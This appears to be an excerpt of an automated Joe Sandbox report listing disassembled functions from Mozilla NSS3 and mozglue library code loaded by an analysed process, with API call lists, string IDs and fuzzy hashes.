                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD4198B1A001416BEB31AF189D44ABB3A78ABC230DF198534E80A1BB01E735D994C7E3
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C8A6943
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C8A6957
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C8A6972
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C8A6983
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C8A69AA
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C8A69BE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C8A69D2
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C8A69DF
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C8A6A5B
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C8A6D8C
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C8A6DC5
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C8A6DD6
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C8A6DE7
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C8A6E1F
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C8A6E4B
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C8A6E72
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C8A6EA7
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C8A6EC4
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C8A6ED5
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C8A6EE3
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C8A6EF4
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C8A6F08
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C8A6F35
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C8A6F44
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C8A6F5B
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C8A6F65
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C8A781D,00000000,6C89BE2C,?,6C8A6B1D,?,?,?,?,00000000,00000000,6C8A781D), ref: 6C8A6C40
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C8A781D,?,6C89BE2C,?), ref: 6C8A6C58
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C8A781D), ref: 6C8A6C6F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C8A6C84
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C8A6C96
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C8A6CAA
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C8A6F90
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C8A6FC5
                                                                                                                                                                                                                                                                                        • PK11_GetInternalKeySlot.NSS3 ref: 6C8A6FF4
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1304971872-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 98534ddf741d60fa03027c7b22feec30de5652bf3b8fd3d0e50de2a11b293aa5
                                                                                                                                                                                                                                                                                        • Instruction ID: c3bcac96dda11efec816f1af5c340ff21029703372b8a95ff09573b23ecf90ae
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 98534ddf741d60fa03027c7b22feec30de5652bf3b8fd3d0e50de2a11b293aa5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49B174B1E012099FDF20CBEDDE44B9EBBB4AF09349F240825E815E7644E735E916CB61
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32 ref: 6C8A4C4C
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C8A4C60
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C8A4CA1
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C8A4CBE
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C8A4CD2
                                                                                                                                                                                                                                                                                        • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8A4D3A
                                                                                                                                                                                                                                                                                        • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8A4D4F
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C8A4DB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90DD70: TlsGetValue.KERNEL32 ref: 6C90DD8C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C90DDB4
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C7E204A), ref: 6C8507AD
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C7E204A), ref: 6C8507CD
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C7E204A), ref: 6C8507D6
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C7E204A), ref: 6C8507E4
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsSetValue.KERNEL32(00000000,?,6C7E204A), ref: 6C850864
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C850880
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsSetValue.KERNEL32(00000000,?,?,6C7E204A), ref: 6C8508CB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsGetValue.KERNEL32(?,?,6C7E204A), ref: 6C8508D7
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8507A0: TlsGetValue.KERNEL32(?,?,6C7E204A), ref: 6C8508FB
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32 ref: 6C8A4DD7
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C8A4DEC
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?), ref: 6C8A4E1B
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C8A4E2F
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8A4E5A
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C8A4E71
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C8A4E7A
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?), ref: 6C8A4EA2
                                                                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32 ref: 6C8A4EC1
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C8A4ED6
                                                                                                                                                                                                                                                                                        • PR_Unlock.NSS3(?), ref: 6C8A4F01
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C8A4F2A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 759471828-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2dfb57b41114a9c3fb71c8db71d8fd9e338941c547fc1f1dc90a73d7638e81b4
                                                                                                                                                                                                                                                                                        • Instruction ID: 88f0d22823065f71bfb5d96410ff3f75dbc8494e75d4d8c6534e4399168ceaaf
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2dfb57b41114a9c3fb71c8db71d8fd9e338941c547fc1f1dc90a73d7638e81b4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15B13671A04205EFDF10DFA8D944BAA77B4BF89318F145928EC0597B01EB30E966CBE1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C894CF3
                                                                                                                                                                                                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C894D28
                                                                                                                                                                                                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C894D37
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C97D930: PL_strncpyz.NSS3(?,?,?), ref: 6C97D963
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C894D4D
                                                                                                                                                                                                                                                                                        • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C894D7B
                                                                                                                                                                                                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C894D8A
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C894DA0
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C894DBC
                                                                                                                                                                                                                                                                                        • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C894E20
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                                        • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
                                                                                                                                                                                                                                                                                        • API String ID: 1003633598-3553622718
                                                                                                                                                                                                                                                                                        • Opcode ID: 8d63d1a350aef5962d941604854685b2d82936b7d8bcbe586391951b0e01dd32
                                                                                                                                                                                                                                                                                        • Instruction ID: 8af0013bf21a2dadd3649e2221f099c82bb045b3e2060fbcce722c3ef37e3995
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d63d1a350aef5962d941604854685b2d82936b7d8bcbe586391951b0e01dd32
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA411A75606104AFD7208F18DE88F6A37B5EBD231EF194824F418A7661D731DA48CB61
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7431C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C743217
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7431C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C743236
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7431C0: FreeLibrary.KERNEL32 ref: 6C74324B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7431C0: __Init_thread_footer.LIBCMT ref: 6C743260
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7431C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C74327F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7431C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C74328E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7431C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7432AB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7431C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7432D1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7431C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C7432E5
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7431C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C7432F7
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C759675
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C759697
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C7596E8
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C759707
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C75971F
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C759773
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C7597B7
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6C7597D0
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6C7597EB
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C759824
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                                                                                                                                                                                                        • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                                                        • API String ID: 3361784254-3880535382
                                                                                                                                                                                                                                                                                        • Opcode ID: 823137802cf1f6069c3b510419eabd6212fef04c80cca69b8adce507b98ffbee
                                                                                                                                                                                                                                                                                        • Instruction ID: 95c7a9b4063f6091fe13eaccf44f6dccdf9d6f49f4d6735dd5686d1425df4e4e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 823137802cf1f6069c3b510419eabd6212fef04c80cca69b8adce507b98ffbee
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F061C5B17002069FDF00CF74DA88B9A7BB5EB5A314F908539F91997780DB30EA65CB91
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C991DE0,?), ref: 6C8C6CFE
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8C6D26
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C8C6D70
                                                                                                                                                                                                                                                                                        • PORT_Alloc_Util.NSS3(00000480), ref: 6C8C6D82
                                                                                                                                                                                                                                                                                        • DER_GetInteger_Util.NSS3(?), ref: 6C8C6DA2
                                                                                                                                                                                                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C8C6DD8
                                                                                                                                                                                                                                                                                        • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C8C6E60
                                                                                                                                                                                                                                                                                        • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C8C6F19
                                                                                                                                                                                                                                                                                        • PK11_DigestBegin.NSS3(00000000), ref: 6C8C6F2D
                                                                                                                                                                                                                                                                                        • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C8C6F7B
                                                                                                                                                                                                                                                                                        • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C8C7011
                                                                                                                                                                                                                                                                                        • PK11_FreeSymKey.NSS3(00000000), ref: 6C8C7033
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C8C703F
                                                                                                                                                                                                                                                                                        • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C8C7060
                                                                                                                                                                                                                                                                                        • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C8C7087
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C8C70AF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2108637330-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 69823fecd5071ebf44e921a401c71a74152437c5fcab737c0a6bc142e4caa752
                                                                                                                                                                                                                                                                                        • Instruction ID: e5f1c75db99fcc945f434a99e24bb72a8584072e1b40747f0bfd6dc700985797
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 69823fecd5071ebf44e921a401c71a74152437c5fcab737c0a6bc142e4caa752
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5AA107B1B182059BFB209F24DE45B7A32A4DB8130CF248D3AE959CBB81E775D8458753
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32(6C7CF618), ref: 6C7A6694
                                                                                                                                                                                                                                                                                        • GetThreadId.KERNEL32(?), ref: 6C7A66B1
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C7A66B9
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C7A66E1
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C7CF618), ref: 6C7A6734
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C7A673A
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C7CF618), ref: 6C7A676C
                                                                                                                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 6C7A67FC
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C7A6868
                                                                                                                                                                                                                                                                                        • RtlCaptureContext.NTDLL ref: 6C7A687F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                                                                                                                                                                                                                                        • String ID: WalkStack64
                                                                                                                                                                                                                                                                                        • API String ID: 2357170935-3499369396
                                                                                                                                                                                                                                                                                        • Opcode ID: ff335c13c0a560607b318e3772c7949a297725d67a838e0f2254054072d980e3
                                                                                                                                                                                                                                                                                        • Instruction ID: 2deb4c9ea0c6383957187abbbb47895be7fcf0115d6f00f188c68599bac10109
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff335c13c0a560607b318e3772c7949a297725d67a838e0f2254054072d980e3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8851BE71A09701AFD711CF68CA44B9ABBF8BF89714F008A2DF59897640D770E609CB92
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PK11_SignatureLen.NSS3(?), ref: 6C874D80
                                                                                                                                                                                                                                                                                        • PORT_Alloc_Util.NSS3(00000000), ref: 6C874D95
                                                                                                                                                                                                                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C874DF2
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C874E2C
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C874E43
                                                                                                                                                                                                                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C874E58
                                                                                                                                                                                                                                                                                        • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C874E85
                                                                                                                                                                                                                                                                                        • DER_Encode_Util.NSS3(?,?,6C9C05A4,00000000), ref: 6C874EA7
                                                                                                                                                                                                                                                                                        • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C874F17
                                                                                                                                                                                                                                                                                        • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C874F45
                                                                                                                                                                                                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C874F62
